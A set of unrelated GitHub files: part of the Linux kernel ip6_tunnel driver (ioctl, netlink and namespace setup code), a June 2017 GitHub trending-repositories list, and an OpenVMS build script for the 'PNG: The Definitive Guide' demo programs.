struct ip6_tnl *t = netdev_priv(dev);
struct net *net = t->net;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
switch (cmd) {
case SIOCGETTUNNEL:
/* On the fallback device the user selects a tunnel by parameters;
 * on a real tunnel device the device itself identifies the tunnel.
 */
if (dev == ip6n->fb_tnl_dev) {
if (copy_from_user(&p, ifr->ifr_ifru.ifru_data, sizeof(p))) {
err = -EFAULT;
break;
}
ip6_tnl_parm_from_user(&p1, &p);
t = ip6_tnl_locate(net, &p1, 0);
if (IS_ERR(t))
t = netdev_priv(dev);
} else {
memset(&p, 0, sizeof(p));
}
ip6_tnl_parm_to_user(&p, &t->parms);
if (copy_to_user(ifr->ifr_ifru.ifru_data, &p, sizeof(p))) {
err = -EFAULT;
}
break;
case SIOCADDTUNNEL:
case SIOCCHGTUNNEL:
err = -EPERM;
if (!ns_capable(net->user_ns, CAP_NET_ADMIN))
break;
err = -EFAULT;
if (copy_from_user(&p, ifr->ifr_ifru.ifru_data, sizeof(p)))
break;
err = -EINVAL;
/* Only IPv6-in-IPv6, IPv4-in-IPv6 or "any" (0) are accepted. */
if (p.proto != IPPROTO_IPV6 && p.proto != IPPROTO_IPIP &&
p.proto != 0)
break;
ip6_tnl_parm_from_user(&p1, &p);
/* For ADD, create the tunnel if it does not exist yet. */
t = ip6_tnl_locate(net, &p1, cmd == SIOCADDTUNNEL);
if (cmd == SIOCCHGTUNNEL) {
/* Changing parameters to match a *different* existing tunnel
 * would create a duplicate; reject with -EEXIST.
 */
if (!IS_ERR(t)) {
if (t->dev != dev) {
err = -EEXIST;
break;
}
} else
t = netdev_priv(dev);
if (dev == ip6n->fb_tnl_dev)
err = ip6_tnl0_update(t, &p1);
else
err = ip6_tnl_update(t, &p1);
}
if (!IS_ERR(t)) {
err = 0;
/* Echo the effective parameters back to userspace. */
ip6_tnl_parm_to_user(&p, &t->parms);
if (copy_to_user(ifr->ifr_ifru.ifru_data, &p, sizeof(p)))
err = -EFAULT;
} else {
err = PTR_ERR(t);
}
break;
case SIOCDELTUNNEL:
err = -EPERM;
if (!ns_capable(net->user_ns, CAP_NET_ADMIN))
break;
if (dev == ip6n->fb_tnl_dev) {
err = -EFAULT;
if (copy_from_user(&p, ifr->ifr_ifru.ifru_data, sizeof(p)))
break;
err = -ENOENT;
ip6_tnl_parm_from_user(&p1, &p);
t = ip6_tnl_locate(net, &p1, 0);
if (IS_ERR(t))
break;
err = -EPERM;
/* The fallback device itself may never be deleted this way. */
if (t->dev == ip6n->fb_tnl_dev)
break;
dev = t->dev;
}
err = 0;
unregister_netdevice(dev);
break;
default:
err = -EINVAL;
}
return err;
}
/**
* ip6_tnl_change_mtu - change mtu manually for tunnel device
* @dev: virtual device associated with tunnel
* @new_mtu: the new mtu
*
* Return:
* 0 on success,
* %-EINVAL if mtu too small
**/
static int
ip6_tnl_change_mtu(struct net_device *dev, int new_mtu)
{
	struct ip6_tnl *tnl = netdev_priv(dev);
	/* IPv4 payloads may go as low as the historic 68-byte minimum;
	 * IPv6 payloads must respect IPV6_MIN_MTU.
	 */
	int min_mtu = (tnl->parms.proto == IPPROTO_IPIP) ? 68 : IPV6_MIN_MTU;

	if (new_mtu < min_mtu)
		return -EINVAL;
	/* Upper bound: maximum IPv6 payload minus link-layer overhead. */
	if (new_mtu > 0xFFF8 - dev->hard_header_len)
		return -EINVAL;

	dev->mtu = new_mtu;
	return 0;
}
/* Device operations shared by all non-fallback ip6tnl devices. */
static const struct net_device_ops ip6_tnl_netdev_ops = {
.ndo_init = ip6_tnl_dev_init,
.ndo_uninit = ip6_tnl_dev_uninit,
.ndo_start_xmit = ip6_tnl_xmit,
.ndo_do_ioctl = ip6_tnl_ioctl,
.ndo_change_mtu = ip6_tnl_change_mtu,
.ndo_get_stats = ip6_get_stats,
};
/**
* ip6_tnl_dev_setup - setup virtual tunnel device
* @dev: virtual device associated with tunnel
*
* Description:
* Initialize function pointers and device parameters
**/
static void ip6_tnl_dev_setup(struct net_device *dev)
{
struct ip6_tnl *t;
dev->netdev_ops = &ip6_tnl_netdev_ops;
dev->destructor = ip6_dev_free;
dev->type = ARPHRD_TUNNEL6;
dev->hard_header_len = LL_MAX_HEADER + sizeof(struct ipv6hdr);
/* Default MTU: Ethernet payload minus the outer IPv6 header ... */
dev->mtu = ETH_DATA_LEN - sizeof(struct ipv6hdr);
t = netdev_priv(dev);
/* ... minus 8 bytes for the encapsulation-limit option if in use. */
if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
dev->mtu -= 8;
dev->flags |= IFF_NOARP;
dev->addr_len = sizeof(struct in6_addr);
netif_keep_dst(dev);
/* This perm addr will be used as interface identifier by IPv6 */
dev->addr_assign_type = NET_ADDR_RANDOM;
eth_random_addr(dev->perm_addr);
}
/**
* ip6_tnl_dev_init_gen - general initializer for all tunnel devices
* @dev: virtual device associated with tunnel
**/
/* Common initialisation: bind the priv struct to its device/netns and
 * allocate per-CPU statistics.
 */
static inline int
ip6_tnl_dev_init_gen(struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
t->dev = dev;
t->net = dev_net(dev);
dev->tstats = netdev_alloc_pcpu_stats(struct pcpu_sw_netstats);
if (!dev->tstats)
return -ENOMEM;
return 0;
}
/**
* ip6_tnl_dev_init - initializer for all non fallback tunnel devices
* @dev: virtual device associated with tunnel
**/
static int ip6_tnl_dev_init(struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
int err = ip6_tnl_dev_init_gen(dev);
if (err)
return err;
/* Derive addresses/flags/MTU from the parameters set at creation. */
ip6_tnl_link_config(t);
return 0;
}
/**
* ip6_fb_tnl_dev_init - initializer for fallback tunnel device
* @dev: fallback device
*
* Return: 0
**/
static int __net_init ip6_fb_tnl_dev_init(struct net_device *dev)
{
struct ip6_tnl *t = netdev_priv(dev);
struct net *net = dev_net(dev);
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
t->parms.proto = IPPROTO_IPV6;
/* Hold a reference and publish the fallback tunnel in slot 0 so RCU
 * readers can find it; it lives as long as the netns does.
 */
dev_hold(dev);
rcu_assign_pointer(ip6n->tnls_wc[0], t);
return 0;
}
static int ip6_tnl_validate(struct nlattr *tb[], struct nlattr *data[])
{
	u8 proto;

	/* Absent attribute means "leave the protocol unspecified" — valid. */
	if (!data || !data[IFLA_IPTUN_PROTO])
		return 0;

	proto = nla_get_u8(data[IFLA_IPTUN_PROTO]);
	switch (proto) {
	case IPPROTO_IPV6:
	case IPPROTO_IPIP:
	case 0:
		return 0;
	default:
		return -EINVAL;
	}
}
/* Fill *parms from the IFLA_IPTUN_* netlink attributes; attributes that
 * are absent leave the corresponding field zeroed.
 */
static void ip6_tnl_netlink_parms(struct nlattr *data[],
struct __ip6_tnl_parm *parms)
{
memset(parms, 0, sizeof(*parms));
if (!data)
return;
if (data[IFLA_IPTUN_LINK])
parms->link = nla_get_u32(data[IFLA_IPTUN_LINK]);
if (data[IFLA_IPTUN_LOCAL])
nla_memcpy(&parms->laddr, data[IFLA_IPTUN_LOCAL],
sizeof(struct in6_addr));
if (data[IFLA_IPTUN_REMOTE])
nla_memcpy(&parms->raddr, data[IFLA_IPTUN_REMOTE],
sizeof(struct in6_addr));
if (data[IFLA_IPTUN_TTL])
parms->hop_limit = nla_get_u8(data[IFLA_IPTUN_TTL]);
if (data[IFLA_IPTUN_ENCAP_LIMIT])
parms->encap_limit = nla_get_u8(data[IFLA_IPTUN_ENCAP_LIMIT]);
if (data[IFLA_IPTUN_FLOWINFO])
parms->flowinfo = nla_get_be32(data[IFLA_IPTUN_FLOWINFO]);
if (data[IFLA_IPTUN_FLAGS])
parms->flags = nla_get_u32(data[IFLA_IPTUN_FLAGS]);
if (data[IFLA_IPTUN_PROTO])
parms->proto = nla_get_u8(data[IFLA_IPTUN_PROTO]);
}
static int ip6_tnl_newlink(struct net *src_net, struct net_device *dev,
struct nlattr *tb[], struct nlattr *data[])
{
struct net *net = dev_net(dev);
struct ip6_tnl *nt, *t;
nt = netdev_priv(dev);
ip6_tnl_netlink_parms(data, &nt->parms);
/* Refuse to create a second tunnel with identical parameters. */
t = ip6_tnl_locate(net, &nt->parms, 0);
if (!IS_ERR(t))
return -EEXIST;
return ip6_tnl_create2(dev);
}
static int ip6_tnl_changelink(struct net_device *dev, struct nlattr *tb[],
struct nlattr *data[])
{
struct ip6_tnl *t = netdev_priv(dev);
struct __ip6_tnl_parm p;
struct net *net = t->net;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
/* The fallback device cannot be reconfigured via netlink. */
if (dev == ip6n->fb_tnl_dev)
return -EINVAL;
ip6_tnl_netlink_parms(data, &p);
/* If another tunnel already has these parameters, reject; matching
 * ourselves (or no match) means we can apply the update.
 */
t = ip6_tnl_locate(net, &p, 0);
if (!IS_ERR(t)) {
if (t->dev != dev)
return -EEXIST;
} else
t = netdev_priv(dev);
return ip6_tnl_update(t, &p);
}
static void ip6_tnl_dellink(struct net_device *dev, struct list_head *head)
{
	struct ip6_tnl_net *ip6n = net_generic(dev_net(dev), ip6_tnl_net_id);

	/* The fallback device is torn down with the netns, never here. */
	if (dev == ip6n->fb_tnl_dev)
		return;

	unregister_netdevice_queue(dev, head);
}
/* Worst-case netlink attribute payload needed to dump one tunnel. */
static size_t ip6_tnl_get_size(const struct net_device *dev)
{
return
/* IFLA_IPTUN_LINK */
nla_total_size(4) +
/* IFLA_IPTUN_LOCAL */
nla_total_size(sizeof(struct in6_addr)) +
/* IFLA_IPTUN_REMOTE */
nla_total_size(sizeof(struct in6_addr)) +
/* IFLA_IPTUN_TTL */
nla_total_size(1) +
/* IFLA_IPTUN_ENCAP_LIMIT */
nla_total_size(1) +
/* IFLA_IPTUN_FLOWINFO */
nla_total_size(4) +
/* IFLA_IPTUN_FLAGS */
nla_total_size(4) +
/* IFLA_IPTUN_PROTO */
nla_total_size(1) +
0;
}
/* Emit the tunnel's parameters as IFLA_IPTUN_* attributes into skb.
 * Returns -EMSGSIZE if the message buffer runs out of room.
 */
static int ip6_tnl_fill_info(struct sk_buff *skb, const struct net_device *dev)
{
struct ip6_tnl *tunnel = netdev_priv(dev);
struct __ip6_tnl_parm *parm = &tunnel->parms;
if (nla_put_u32(skb, IFLA_IPTUN_LINK, parm->link) ||
nla_put(skb, IFLA_IPTUN_LOCAL, sizeof(struct in6_addr),
&parm->laddr) ||
nla_put(skb, IFLA_IPTUN_REMOTE, sizeof(struct in6_addr),
&parm->raddr) ||
nla_put_u8(skb, IFLA_IPTUN_TTL, parm->hop_limit) ||
nla_put_u8(skb, IFLA_IPTUN_ENCAP_LIMIT, parm->encap_limit) ||
nla_put_be32(skb, IFLA_IPTUN_FLOWINFO, parm->flowinfo) ||
nla_put_u32(skb, IFLA_IPTUN_FLAGS, parm->flags) ||
nla_put_u8(skb, IFLA_IPTUN_PROTO, parm->proto))
goto nla_put_failure;
return 0;
nla_put_failure:
return -EMSGSIZE;
}
struct net *ip6_tnl_get_link_net(const struct net_device *dev)
{
struct ip6_tnl *tunnel = netdev_priv(dev);
return tunnel->net;
}
EXPORT_SYMBOL(ip6_tnl_get_link_net);
/* Netlink attribute validation policy for IFLA_IPTUN_* attributes. */
static const struct nla_policy ip6_tnl_policy[IFLA_IPTUN_MAX + 1] = {
[IFLA_IPTUN_LINK] = { .type = NLA_U32 },
[IFLA_IPTUN_LOCAL] = { .len = sizeof(struct in6_addr) },
[IFLA_IPTUN_REMOTE] = { .len = sizeof(struct in6_addr) },
[IFLA_IPTUN_TTL] = { .type = NLA_U8 },
[IFLA_IPTUN_ENCAP_LIMIT] = { .type = NLA_U8 },
[IFLA_IPTUN_FLOWINFO] = { .type = NLA_U32 },
[IFLA_IPTUN_FLAGS] = { .type = NLA_U32 },
[IFLA_IPTUN_PROTO] = { .type = NLA_U8 },
};
/* rtnetlink glue: lets "ip link add ... type ip6tnl" manage these devices. */
static struct rtnl_link_ops ip6_link_ops __read_mostly = {
.kind = "ip6tnl",
.maxtype = IFLA_IPTUN_MAX,
.policy = ip6_tnl_policy,
.priv_size = sizeof(struct ip6_tnl),
.setup = ip6_tnl_dev_setup,
.validate = ip6_tnl_validate,
.newlink = ip6_tnl_newlink,
.changelink = ip6_tnl_changelink,
.dellink = ip6_tnl_dellink,
.get_size = ip6_tnl_get_size,
.fill_info = ip6_tnl_fill_info,
.get_link_net = ip6_tnl_get_link_net,
};
/* Tunnel handler for IPv4-in-IPv6 (protocol IPPROTO_IPIP) packets. */
static struct xfrm6_tunnel ip4ip6_handler __read_mostly = {
.handler = ip4ip6_rcv,
.err_handler = ip4ip6_err,
.priority = 1,
};
/* Tunnel handler for IPv6-in-IPv6 (protocol IPPROTO_IPV6) packets. */
static struct xfrm6_tunnel ip6ip6_handler __read_mostly = {
.handler = ip6ip6_rcv,
.err_handler = ip6ip6_err,
.priority = 1,
};
/* Queue every ip6tnl device associated with this netns for unregistration:
 * first all devices living in the netns, then tunnels hashed here whose
 * device was moved to another netns.
 */
static void __net_exit ip6_tnl_destroy_tunnels(struct net *net)
{
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
struct net_device *dev, *aux;
int h;
struct ip6_tnl *t;
LIST_HEAD(list);
for_each_netdev_safe(net, dev, aux)
if (dev->rtnl_link_ops == &ip6_link_ops)
unregister_netdevice_queue(dev, &list);
for (h = 0; h < HASH_SIZE; h++) {
t = rtnl_dereference(ip6n->tnls_r_l[h]);
while (t != NULL) {
/* If dev is in the same netns, it has already
 * been added to the list by the previous loop.
 */
if (!net_eq(dev_net(t->dev), net))
unregister_netdevice_queue(t->dev, &list);
t = rtnl_dereference(t->next);
}
}
unregister_netdevice_many(&list);
}
/* Per-netns init: set up the hash table pointers and create/register the
 * "ip6tnl0" fallback device for this namespace.
 */
static int __net_init ip6_tnl_init_net(struct net *net)
{
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
struct ip6_tnl *t = NULL;
int err;
ip6n->tnls[0] = ip6n->tnls_wc;
ip6n->tnls[1] = ip6n->tnls_r_l;
err = -ENOMEM;
ip6n->fb_tnl_dev = alloc_netdev(sizeof(struct ip6_tnl), "ip6tnl0",
NET_NAME_UNKNOWN, ip6_tnl_dev_setup);
if (!ip6n->fb_tnl_dev)
goto err_alloc_dev;
dev_net_set(ip6n->fb_tnl_dev, net);
ip6n->fb_tnl_dev->rtnl_link_ops = &ip6_link_ops;
/* FB netdevice is special: we have one, and only one per netns.
 * Allowing to move it to another netns is clearly unsafe.
 */
ip6n->fb_tnl_dev->features |= NETIF_F_NETNS_LOCAL;
err = ip6_fb_tnl_dev_init(ip6n->fb_tnl_dev);
if (err < 0)
goto err_register;
err = register_netdev(ip6n->fb_tnl_dev);
if (err < 0)
goto err_register;
t = netdev_priv(ip6n->fb_tnl_dev);
strcpy(t->parms.name, ip6n->fb_tnl_dev->name);
return 0;
err_register:
/* Undo the allocation; register_netdev failure frees nothing itself. */
ip6_dev_free(ip6n->fb_tnl_dev);
err_alloc_dev:
return err;
}
/* Per-netns teardown: destroy all tunnels under the RTNL lock. */
static void __net_exit ip6_tnl_exit_net(struct net *net)
{
rtnl_lock();
ip6_tnl_destroy_tunnels(net);
rtnl_unlock();
}
/* Per-network-namespace lifecycle hooks and private-state sizing. */
static struct pernet_operations ip6_tnl_net_ops = {
.init = ip6_tnl_init_net,
.exit = ip6_tnl_exit_net,
.id = &ip6_tnl_net_id,
.size = sizeof(struct ip6_tnl_net),
};
/**
* ip6_tunnel_init - register protocol and reserve needed resources
*
* Return: 0 on success
**/
static int __init ip6_tunnel_init(void)
{
int err;
/* Registration order: pernet state, then both tunnel protocol
 * handlers, then the rtnetlink ops. The error labels unwind in
 * exactly the reverse order.
 */
err = register_pernet_device(&ip6_tnl_net_ops);
if (err < 0)
goto out_pernet;
err = xfrm6_tunnel_register(&ip4ip6_handler, AF_INET);
if (err < 0) {
pr_err("%s: can't register ip4ip6\n", __func__);
goto out_ip4ip6;
}
err = xfrm6_tunnel_register(&ip6ip6_handler, AF_INET6);
if (err < 0) {
pr_err("%s: can't register ip6ip6\n", __func__);
goto out_ip6ip6;
}
err = rtnl_link_register(&ip6_link_ops);
if (err < 0)
goto rtnl_link_failed;
return 0;
rtnl_link_failed:
xfrm6_tunnel_deregister(&ip6ip6_handler, AF_INET6);
out_ip6ip6:
xfrm6_tunnel_deregister(&ip4ip6_handler, AF_INET);
out_ip4ip6:
unregister_pernet_device(&ip6_tnl_net_ops);
out_pernet:
return err;
}
/**
* ip6_tunnel_cleanup - free resources and unregister protocol
**/
static void __exit ip6_tunnel_cleanup(void)
{
/* Teardown mirrors init in reverse; deregistration failures are only
 * logged since there is nothing useful to do about them at exit.
 */
rtnl_link_unregister(&ip6_link_ops);
if (xfrm6_tunnel_deregister(&ip4ip6_handler, AF_INET))
pr_info("%s: can't deregister ip4ip6\n", __func__);
if (xfrm6_tunnel_deregister(&ip6ip6_handler, AF_INET6))
pr_info("%s: can't deregister ip6ip6\n", __func__);
unregister_pernet_device(&ip6_tnl_net_ops);
}
module_init(ip6_tunnel_init);
module_exit(ip6_tunnel_cleanup);
| {
"pile_set_name": "Github"
} |
## 2017-06-24
#### python
* [plotly / dash](https://github.com/plotly/dash):Interactive, reactive web apps in pure python ⭐️
* [tensorflow / tensor2tensor](https://github.com/tensorflow/tensor2tensor):A library for generalized sequence to sequence models
* [tensorflow / models](https://github.com/tensorflow/models):Models built with TensorFlow
* [astorfi / TensorFlow-World](https://github.com/astorfi/TensorFlow-World):
* [iadgov / goSecure](https://github.com/iadgov/goSecure):An easy to use and portable Virtual Private Network (VPN) system built with Linux and a Raspberry Pi. iadgov
* [eladhoffer / seq2seq.pytorch](https://github.com/eladhoffer/seq2seq.pytorch):Sequence-to-Sequence learning using PyTorch
* [fchollet / keras](https://github.com/fchollet/keras):Deep Learning library for Python. Runs on TensorFlow, Theano, or CNTK.
* [elceef / dnstwist](https://github.com/elceef/dnstwist):Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
* [NationalSecurityAgency / lemongraph](https://github.com/NationalSecurityAgency/lemongraph):Log-based transactional graph engine
* [pallets / flask](https://github.com/pallets/flask):A microframework based on Werkzeug, Jinja2 and good intentions
* [xiyouMc / ncmbot](https://github.com/xiyouMc/ncmbot):NeteaseCloudMusic Bot for Philharmonic™. ✨ 🍰 ✨ 网易云音乐 Python 组件库,用 Python 玩转网易云音乐
* [ApacheInfra / superset](https://github.com/ApacheInfra/superset):Apache Superset (incubating) is a modern, enterprise-ready business intelligence web application
* [shadowsocks / shadowsocks](https://github.com/shadowsocks/shadowsocks):
* [XX-net / XX-Net](https://github.com/XX-net/XX-Net):a web proxy tool
* [vinta / awesome-python](https://github.com/vinta/awesome-python):A curated list of awesome Python frameworks, libraries, software and resources
* [django / django](https://github.com/django/django):The Web framework for perfectionists with deadlines.
* [python / cpython](https://github.com/python/cpython):The Python programming language
* [samrayleung / jd_spider](https://github.com/samrayleung/jd_spider):两只蠢萌京东的分布式爬虫.
* [rg3 / youtube-dl](https://github.com/rg3/youtube-dl):Command-line program to download videos from YouTube.com and other video sites
* [scrapy / scrapy](https://github.com/scrapy/scrapy):Scrapy, a fast high-level web crawling & scraping framework for Python.
* [LaoDar / cnn_head_pose_estimator](https://github.com/LaoDar/cnn_head_pose_estimator):a simple and fast mxnet version CNN based head pose estimator
* [soimort / you-get](https://github.com/soimort/you-get):⏬ Dumb downloader that scrapes the web
* [leostat / rtfm](https://github.com/leostat/rtfm):A database of common, interesting or useful commands, in one handy referable form
* [josephmisiti / awesome-machine-learning](https://github.com/josephmisiti/awesome-machine-learning):A curated list of awesome Machine Learning frameworks, libraries and software.
* [donnemartin / system-design-primer](https://github.com/donnemartin/system-design-primer):Learn how to design large-scale systems. Prep for the system design interview. Includes Anki flashcards.
#### swift
* [toineheuvelmans / Metron](https://github.com/toineheuvelmans/Metron):Geometry, simplified.
* [atomic14 / VisionCoreMLSample](https://github.com/atomic14/VisionCoreMLSample):Sample application using Vision Framework and Core ML
* [loregr / LGButton](https://github.com/loregr/LGButton):A fully customisable subclass of the native UIControl which allows you to create beautiful buttons without writing any line of code.
* [artemnovichkov / iOS-11-by-Examples](https://github.com/artemnovichkov/iOS-11-by-Examples):Examples of new iOS 11 APIs
* [raywenderlich / swift-algorithm-club](https://github.com/raywenderlich/swift-algorithm-club):Algorithms and data structures in Swift, with explanations!
* [xmartlabs / Bender](https://github.com/xmartlabs/Bender):Easily craft fast Neural Networks on iOS! Use TensorFlow models. Metal under the hood.
* [patchthecode / JTAppleCalendar](https://github.com/patchthecode/JTAppleCalendar):The Unofficial Swift Apple Calendar Library. View. Control. for iOS & tvOS
* [chriseidhof / tea-in-swift](https://github.com/chriseidhof/tea-in-swift):The Elm Architecture in Swift
* [luckytianyiyan / TySimulator](https://github.com/luckytianyiyan/TySimulator):The utility for fast access to your iPhone Simulator apps.
* [lkzhao / Hero](https://github.com/lkzhao/Hero):Elegant transition library for iOS & tvOS
* [Clean-Swift / CleanStore](https://github.com/Clean-Swift/CleanStore):A sample iOS app built using the Clean Swift architecture. Clean Swift is Uncle Bob's Clean Architecture applied to iOS and Mac projects. CleanStore demonstrates Clean Swift by implementing the create order use case described by in Uncle Bob's talks.
* [ReSwift / ReSwift](https://github.com/ReSwift/ReSwift):Unidirectional Data Flow in Swift - Inspired by Redux
* [vsouza / awesome-ios](https://github.com/vsouza/awesome-ios):A curated list of awesome iOS ecosystem, including Objective-C and Swift Projects
* [dkhamsing / open-source-ios-apps](https://github.com/dkhamsing/open-source-ios-apps):📱 Collaborative List of Open-Source iOS Apps
* [Carthage / Carthage](https://github.com/Carthage/Carthage):A simple, decentralized dependency manager for Cocoa
* [hollance / YOLO-CoreML-MPSNNGraph](https://github.com/hollance/YOLO-CoreML-MPSNNGraph):Tiny YOLO for iOS implemented using CoreML but also using the new MPS graph API.
* [vapor / vapor](https://github.com/vapor/vapor):A server-side Swift web framework.
* [ReactiveX / RxSwift](https://github.com/ReactiveX/RxSwift):Reactive Programming in Swift
* [Alamofire / Alamofire](https://github.com/Alamofire/Alamofire):Elegant HTTP Networking in Swift
* [Moya / Moya](https://github.com/Moya/Moya):Network abstraction layer written in Swift.
* [danielgindi / Charts](https://github.com/danielgindi/Charts):Beautiful charts for iOS/tvOS/OSX! The Apple side of the crossplatform MPAndroidChart.
* [lhc70000 / iina](https://github.com/lhc70000/iina):The modern video player for macOS.
* [jegumhon / URWeatherView](https://github.com/jegumhon/URWeatherView):Show the weather effects onto view written in Swift3
* [okhanokbay / ExpyTableView](https://github.com/okhanokbay/ExpyTableView):Make your own expandable table view with one method. Written in Swift 3.
* [CosmicMind / Material](https://github.com/CosmicMind/Material):An animation and graphics framework for Material Design in Swift.
#### javascript
* [jondot / react-flight](https://github.com/jondot/react-flight):The best way to build animation compositions for React.
* [grab / front-end-guide](https://github.com/grab/front-end-guide):📚 Study guide and introduction to the modern front end stack.
* [dabbott / react-express](https://github.com/dabbott/react-express):The all-in-one beginner's guide to modern React application development!
* [typicode / json-server](https://github.com/typicode/json-server):Get a full fake REST API with zero coding in less than 30 seconds (seriously)
* [brakmic / BlockchainStore](https://github.com/brakmic/BlockchainStore):💰 Retail Store that runs on Ethereum
* [webkul / coolhue](https://github.com/webkul/coolhue):Coolest Gradient Hues and Swatches by UVdesk
* [paulsonnentag / swip](https://github.com/paulsonnentag/swip):a library to create multi device experiments
* [facebook / react](https://github.com/facebook/react):A declarative, efficient, and flexible JavaScript library for building user interfaces.
* [vuejs / vue](https://github.com/vuejs/vue):A progressive, incrementally-adoptable JavaScript framework for building UI on the web.
* [intercellular / cell](https://github.com/intercellular/cell):A self-driving web app framework
* [getify / You-Dont-Know-JS](https://github.com/getify/You-Dont-Know-JS):A book series on JavaScript. @YDKJS on twitter.
* [facebookincubator / create-react-app](https://github.com/facebookincubator/create-react-app):Create React apps with no build configuration.
* [OptimalBits / redbird](https://github.com/OptimalBits/redbird):A modern reverse proxy for node
* [ecrmnn / collect.js](https://github.com/ecrmnn/collect.js):Convenient and dependency free wrapper for working with arrays and objects
* [pixijs / pixi.js](https://github.com/pixijs/pixi.js):Super fast HTML 5 2D rendering engine that uses webGL with canvas fallback
* [prettier / prettier](https://github.com/prettier/prettier):Prettier is an opinionated code formatter.
* [jakubgarfield / expenses](https://github.com/jakubgarfield/expenses):💰 Expense tracker using Google Sheets 📉 as a storage written in React
* [twbs / bootstrap](https://github.com/twbs/bootstrap):The most popular HTML, CSS, and JavaScript framework for developing responsive, mobile first projects on the web.
* [mzabriskie / axios](https://github.com/mzabriskie/axios):Promise based HTTP client for the browser and node.js
* [sindresorhus / refined-github](https://github.com/sindresorhus/refined-github):Browser extension that simplifies the GitHub interface and adds useful features
* [airbnb / javascript](https://github.com/airbnb/javascript):JavaScript Style Guide
* [facebook / react-native](https://github.com/facebook/react-native):A framework for building native apps with React.
* [gpbl / react-day-picker](https://github.com/gpbl/react-day-picker):Flexible date picker for React
* [deepstreamIO / golden-layout](https://github.com/deepstreamIO/golden-layout):The ultimate Javascript layout manager
* [cantierecreativo / redux-bees](https://github.com/cantierecreativo/redux-bees):A nice, short and declarative way to interact with JSON APIs
#### go
* [nuveo / prest](https://github.com/nuveo/prest):A fully RESTful API from any existing PostgreSQL database written in Go
* [bradfitz / tcpproxy](https://github.com/bradfitz/tcpproxy):Go package for writing TCP proxies, routing based on HTTP Host headers and SNI server names.
* [fogleman / pack3d](https://github.com/fogleman/pack3d):Tightly pack 3D models.
* [ethereum / go-ethereum](https://github.com/ethereum/go-ethereum):Official Go implementation of the Ethereum protocol
* [upspin / upspin](https://github.com/upspin/upspin):Upspin: A framework for naming everyone's everything.
* [kubernetes / kubernetes](https://github.com/kubernetes/kubernetes):Production-Grade Container Scheduling and Management
* [golang / go](https://github.com/golang/go):The Go programming language
* [go-macaron / macaron](https://github.com/go-macaron/macaron):Package macaron is a high productive and modular web framework in Go.
* [avelino / awesome-go](https://github.com/avelino/awesome-go):A curated list of awesome Go frameworks, libraries and software
* [rqlite / rqlite](https://github.com/rqlite/rqlite):The lightweight, distributed relational database built on SQLite.
* [rs / zerolog](https://github.com/rs/zerolog):Zero Allocation JSON Logger
* [gobuffalo / packr](https://github.com/gobuffalo/packr):The simple and easy way to embed static files into Go binaries.
* [tmrts / go-patterns](https://github.com/tmrts/go-patterns):Curated list of Go design patterns, recipes and idioms
* [gohugoio / hugo](https://github.com/gohugoio/hugo):A Fast and Flexible Static Site Generator built with love in GoLang.
* [NebulousLabs / Sia](https://github.com/NebulousLabs/Sia):Blockchain-based marketplace for file storage
* [istio / istio](https://github.com/istio/istio):Sample code, build and tests and governance material for the Istio project.
* [gogits / gogs](https://github.com/gogits/gogs):Gogs is a painless self-hosted Git service.
* [hajimehoshi / go-mp3](https://github.com/hajimehoshi/go-mp3):An MP3 decoder in pure Go
* [moby / moby](https://github.com/moby/moby):Moby Project - a collaborative project for the container ecosystem to assemble container-based systems
* [prometheus / prometheus](https://github.com/prometheus/prometheus):The Prometheus monitoring system and time series database.
* [grafana / grafana](https://github.com/grafana/grafana):The tool for beautiful monitoring and metric analytics & dashboards for Graphite, InfluxDB & Prometheus & More
* [apex / apex](https://github.com/apex/apex):Build, deploy, and manage AWS Lambda functions with ease (with Go support!).
* [fatedier / frp](https://github.com/fatedier/frp):A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.
* [Unknwon / the-way-to-go_ZH_CN](https://github.com/Unknwon/the-way-to-go_ZH_CN):《The Way to Go》中文译本,中文正式名《Go入门指南》
* [drone / drone](https://github.com/drone/drone):Drone is a Continuous Delivery platform built on Docker, written in Go
| {
"pile_set_name": "Github"
} |
-c
| {
"pile_set_name": "Github"
} |
$!------------------------------------------------------------------------------
$! make "PNG: The Definitive Guide" demo programs (for X) under OpenVMS
$!
$! Script created by Martin Zinser for libpng; modified by Greg Roelofs
$! for standalone pngbook source distribution.
$!
$!
$! Set locations where zlib and libpng sources live.
$!
$ zpath = ""
$ pngpath = ""
$!
$! Probe the two known relative layouts for the zlib and libpng trees.
$ if f$search("[---.zlib]zlib.h").nes."" then zpath = "[---.zlib]"
$ if f$search("[--]png.h").nes."" then pngpath = "[--]"
$!
$ if f$search("[-.zlib]zlib.h").nes."" then zpath = "[-.zlib]"
$ if f$search("[-.libpng]png.h").nes."" then pngpath = "[-.libpng]"
$!
$ if zpath .eqs. ""
$ then
$ write sys$output "zlib include not found. Exiting..."
$ exit 2
$ endif
$!
$ if pngpath .eqs. ""
$ then
$ write sys$output "libpng include not found. Exiting..."
$ exit 2
$ endif
$!
$! Look for the compiler used.
$!
$ ccopt="/include=(''zpath',''pngpath')"
$ if f$getsyi("HW_MODEL").ge.1024
$ then
$! HW_MODEL >= 1024 means Alpha hardware: DEC C is the compiler.
$ ccopt = "/prefix=all"+ccopt
$ comp = "__decc__=1"
$ if f$trnlnm("SYS").eqs."" then define sys sys$library:
$ else
$ if f$search("SYS$SYSTEM:DECC$COMPILER.EXE").eqs.""
$ then
$ if f$trnlnm("SYS").eqs."" then define sys sys$library:
$ if f$search("SYS$SYSTEM:VAXC.EXE").eqs.""
$ then
$ comp = "__gcc__=1"
$ CC :== GCC
$ else
$ comp = "__vaxc__=1"
$ endif
$ else
$ if f$trnlnm("SYS").eqs."" then define sys decc$library_include:
$ ccopt = "/decc/prefix=all"+ccopt
$ comp = "__decc__=1"
$ endif
$ endif
$! Write linker options files naming the png/zlib and X11 libraries.
$ open/write lopt lib.opt
$ write lopt "''pngpath'libpng.olb/lib"
$ write lopt "''zpath'libz.olb/lib"
$ close lopt
$ open/write xopt x11.opt
$ write xopt "sys$library:decw$xlibshr.exe/share"
$ close xopt
$!
